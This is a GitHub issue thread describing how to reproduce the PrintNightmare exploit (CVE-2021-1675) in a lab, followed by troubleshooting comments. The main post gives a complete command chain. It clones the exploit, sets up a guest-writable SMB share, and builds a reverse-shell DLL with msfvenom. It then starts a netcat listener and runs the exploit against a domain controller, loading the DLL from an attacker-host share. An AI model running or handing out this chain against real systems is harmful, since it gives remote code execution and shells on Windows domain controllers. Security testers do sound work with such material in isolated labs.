How to Reproduce (Virtual Environment):
BlackSnufkin opened this issue · 13 comments
This is how I was able to reproduce the exploit in a virtual environment:
-
The best practice is to create Python virtual Environment
python3 -m venv PrintNightmare
source PrintNightmare/bin/activate
- clone the repo and install the custom Impacket version:
git clone https://github.com/cube0x0/CVE-2021-1675.git
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
- Set up SMB share
- copy the original smb.conf file and create a backup file
cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
- now on the smb.conf change to this new configuration File
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = nobody
-
Spin up SMB share:
impacket-smbserver smb /tmp/
In case you have some problems with the SMB try to use build-in SMBD service
service smbd start
- Payload Creation:
-
Create Reverse shell Payload as a DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll
- Windows Environment:
- you need to create a dc with an active directory.
- create a low privilege user
- create a windows 10 as the client join him in the domain
- login into the win10 with the new user
- Set up a listener
nc -lnvp 9001
- Run the Exploit
python3 CVE-2021-1675.py <FQDN>/<USER_Name>:<PASSWORD>@<DC IP> '\\<ATTACKER_IP>\smb\rev.dll'
- ENJOY your SHELL =)
Machines:
- Attacker: kali Linux
- DC: Server 2016
- Client: win10
Shell i reboot all machine?
sometimes the spools service get crashed make sure that the service is running you can use rpcdump to verify
DC and Client all need to be make sure?
interesting try to check manually on the DC,
if still having problems just reboot
I use Server 2012 as DC,will it cause problems?
basically no but if remember right I saw someone on Twitter claiming he had problems with that version
OK,i will use your config.Thank you very mach, hope i can fix that before dinner.I have work for it 2days...(;´༎ຶД༎ຶ`)
😄 it all good it took me 4 days until I was able to reproduce just try harder 😉
server 2012 r2 (dc) will failed with normal user
I think this issue is because of the hard coded shebang (e.g. - #!/usr/bin/python3
)
Changing to #!/usr/bin/env python3
solved the issue for me.
Thank you, my using the payload windows/shell_reverse_tcp fails. Using the payload you suggest, windows/x64/shell_reverse_tcp is successful.